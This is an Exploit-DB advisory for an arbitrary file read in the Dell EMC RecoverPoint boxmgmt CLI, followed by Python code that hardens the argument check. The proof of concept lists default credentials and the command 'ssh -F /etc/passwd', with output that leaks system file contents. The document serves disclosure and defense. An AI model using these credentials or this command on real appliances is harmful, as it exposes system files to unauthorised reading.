Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read

EDB-ID: 44688
Author: Paul Taylor
Published: 2018-05-22
Type: Local
Platform: Linux
Vulnerable App: N/A

# Version: All versions before RP 5.1.2, and all versions before RP4VMs
# Date: 2018-05-21
# Vendor Advisory: DSA-2018-095
# Vendor KB:
# Exploit Author: Paul Taylor
# Github:
# Website:
# Tested on: RP4VMs, RP 5.1.SP1.P2
# CVE: N/A

# 1. Description
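# When logged in as boxmgmt and running an internal command, the allowed ssh command can be used
# to display the contents of any file on the file system that the boxmgmt user can read.
# Passing the file to ssh -F makes ssh parse it as a configuration file, and the resulting
# "Bad configuration option" errors echo each line of the file.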

# 2. Proof of Concept
# Log in as boxmgmt via SSH (default credentials boxmgmt/boxmgmt)
# Select [3] Diagnostics
# Select [5] Run Internal Command
# ssh -F /etc/passwd

test-cluster: 5
This is the list of commands you are allowed to use: ALAT NetDiag arp arping date ethtool netstat ping ping6 ssh telnet top uptime
Enter internal command: ssh -F /etc/passwd
/etc/passwd: line 1: Bad configuration option: root:x:0:0:root:/root:/bin/tcsh
/etc/passwd: line 2: Bad configuration option: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
/etc/passwd: line 3: Bad configuration option: bin:x:2:2:bin:/bin:/usr/sbin/nologin
/etc/passwd: terminating, 34 bad configuration options
Command "ssh -F /etc/passwd" exited with return code 65280
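
The transcript above shows a menu that restricts the command name but passes its arguments through unchecked. As an added example (not the vendor's fix and not code from the advisory), the following Python contrasts a name-only check with a per-command argument allow-list for ssh; the option policy, the regular expressions and the function names are assumptions.

```python
import re
import shlex

# Command names copied from the menu output above.
ALLOWED = {"ALAT", "NetDiag", "arp", "arping", "date", "ethtool", "netstat",
           "ping", "ping6", "ssh", "telnet", "top", "uptime"}

# Assumed policy: the only ssh options a diagnostics operator needs.
# True means the option consumes the next argument as its value.
SSH_OPTIONS = {"-4": False, "-6": False, "-v": False, "-p": True, "-l": True}
SAFE_VALUE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]*\Z")
DESTINATION = re.compile(r"(?:[A-Za-z0-9._-]+@)?[A-Za-z0-9][A-Za-z0-9.:_-]*\Z")


def name_only_check(line):
    """Weak check: validates the command name and ignores its arguments."""
    argv = shlex.split(line)
    return bool(argv) and argv[0] in ALLOWED


def ssh_args_check(line):
    """Hardened check: allow-listed options, one destination, no remote command."""
    try:
        argv = shlex.split(line)
    except ValueError:  # unbalanced quotes
        return False
    if not argv or argv[0] != "ssh":
        return False
    args, destination = argv[1:], None
    i = 0
    while i < len(args):
        arg = args[i]
        if arg.startswith("-"):
            # Exact match only, so -F and glued forms such as -F/etc/passwd fail.
            if arg not in SSH_OPTIONS:
                return False
            if SSH_OPTIONS[arg]:
                i += 1
                if i >= len(args) or not SAFE_VALUE.match(args[i]):
                    return False
        elif destination is None and DESTINATION.match(arg):
            destination = arg
        else:
            return False  # a second positional argument would be a remote command
        i += 1
    return destination is not None
```

Allow-listing options, rather than deny-listing -F alone, keeps the check valid when the ssh client gains new options that take a file path.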

